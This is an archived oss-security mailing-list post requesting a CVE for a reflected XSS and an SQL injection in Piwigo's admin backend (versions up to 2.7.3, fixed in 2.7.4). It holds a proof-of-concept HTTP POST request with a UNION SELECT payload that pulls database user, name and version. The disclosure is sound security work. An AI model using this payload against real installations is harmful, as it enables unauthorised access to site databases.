Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Wed, 18 Feb 2015 16:38:35 +0100
From: Steffen Rösemann <>
Subject: CVE-Request -- Piwigo <= v. 2.7.3 -- Reflecting XSS- and
 SQLi-vulnerability in administrative backend

Hi Steve, Josh, vendors, list.

I found a reflecting XSS- and a SQL injection-vulnerability in the
administrative backend of Piwigo <= v. 2.7.3.

The reflecting XSS vulnerability resides in the "page" parameter used in
the file admin.php which can be found in the administrative backend located
here in a common Piwigo installation:




The SQL injection vulnerability can as well be found in the administrative
backend and can be found in the "History" functionality located here:


The SQL injection vulnerability can be exploited by appending arbitrary SQL
statements in a POST request to the parameter "user":


POST /piwigo/admin.php?page=history HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101
Firefox/31.0 Iceweasel/31.3.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/piwigo/admin.php?page=history&search_id=82
Cookie: pwg_display_thumbnail=no_display_thumbnail;
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 255

AND 1=2 UNION SELECT user(),database(),3,version(),5,6,7,8,9 --

The issue has been fixed in version 2.7.4, released on 17th February 2015.

Can I have a CVE-ID for it?

Thank you very much.

Greetings from Germany.

Steffen Rösemann



Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ